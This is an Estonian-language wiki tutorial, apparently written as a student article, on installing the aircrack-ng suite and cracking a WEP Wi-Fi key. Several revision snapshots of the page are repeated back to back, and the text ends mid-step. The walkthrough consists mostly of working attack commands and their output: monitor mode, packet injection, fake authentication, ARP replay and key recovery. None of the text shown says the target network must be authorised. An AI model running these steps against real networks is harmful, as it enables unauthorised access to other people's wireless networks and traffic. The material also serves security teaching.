Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:34:38Z

Ktragel: /* Eesmärk */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:33:40Z

Ktragel: /* Eeldused */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
 
 
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
